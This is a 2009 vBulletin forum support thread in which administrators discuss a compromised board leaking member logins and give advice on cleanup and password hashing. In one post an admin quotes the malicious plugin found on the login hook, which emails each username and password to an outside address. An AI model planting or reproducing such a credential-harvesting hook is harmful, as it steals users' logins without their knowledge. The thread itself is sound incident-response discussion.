Go Back   vb.org Archive > Community Discussions > Forum and Server Management
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #11  
Old 11-07-2009, 09:45 AM
Marco van Herwaarden Marco van Herwaarden is offline
 
Join Date: Jul 2004
Posts: 25,415
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Could it be that this script somehow gives an extra login prompt (fake) and that your users are actually entering their info in there?

Save all your files and database.

Disable and remove (all files!!) all modifications

Disable all your styles and create a new style with no parent (= default style) and set this to be the only style to be used on your board.

Check for modified files using AdminCP -> Maintenance -> Suspect file

Contact vBulletin support for assistence.
Reply With Quote
  #12  
Old 11-07-2009, 09:58 AM
project-Buckfas project-Buckfas is offline
 
Join Date: Jul 2006
Location: Ireland
Posts: 204
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

This happened on a vB board I'm a member of a few weeks ago. The server was compromised and a harvesting script that prompted usernames and passwords to be entered was planted on the homepage.

These were logged to a txt file and later published online with everyones usernames and passwords.

The amount of times a member tried to login was how many times they appeared on the list in the txt file.

This is the reason why your username/passwords are in plain text format. They remain encrypted in the database.

Get in touch with your host and shut down everything. When your back up make every user change there password.
Reply With Quote
  #13  
Old 11-07-2009, 02:21 PM
msimen msimen is offline
 
Join Date: Jun 2009
Posts: 5
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

found and solved ,


here is what i found on some plugins !
just a mod but tell me plz if this

this are the plugins added !

member_complete
vb-sec2 login_verify_success
vb-sec3 global_setup_complete
vb-sec4 misc_start

and this is the content of the vb-sec2

$message = "username: " . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "\nPassword:". $vbulletin->db->escape_string(htmlspecialchars_uni($password));
mail('XXXXX@windowslive.com', 'Victim', $message);
Reply With Quote
  #14  
Old 11-07-2009, 02:50 PM
JamesC70 JamesC70 is offline
 
Join Date: Jun 2007
Posts: 219
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by msimen View Post
found and solved ,


here is what i found on some plugins !
just a mod but tell me plz if this

this are the plugins added !
We'd still like to know which mod did this. Please check in Plugin Manager... above those files listed above, there should be a Product: name.

Write down the product name, then go into Manage Products and find that product on the list.

If the product's name is underlined, then it's clickable. Hover your mouse over that name, right-click, and select Copy Shortcut. Then come back here and paste the link. This will tell us if the product was released on vb.org, or if it came from somewhere else.

If the product's name is not underlined, then copy and paste the name, version, and description into your reply here.

If the product's name does not show on Manage Products, then return to Plugin Manager and screenshot the listings, and post your screenshots as a reply here. Maybe someone else is familiar with the product and can identify it.

It is very important that you let us know which modification did this. vb.org can pull the mod, check the code, and if vb.org sees the code that you have posted above they can notify other forums who have downloaded the mod, warning them not to use it.
Reply With Quote
  #15  
Old 11-09-2009, 08:01 AM
Marco van Herwaarden Marco van Herwaarden is offline
 
Join Date: Jul 2004
Posts: 25,415
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

The above script can only sent out real passwords if your config.php file is set to sent plain text passwords to the server. On a default installation plain text passwords are hashed on the client side and never even sent to the server. It is strongly recommended, the proof is in this thread, not to allow unhashed passwords to be sent to the server.
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 04:58 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.03676 seconds
  • Memory Usage 2,201KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (5)post_thanks_box
  • (5)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (5)post_thanks_postbit_info
  • (5)postbit
  • (5)postbit_onlinestatus
  • (5)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete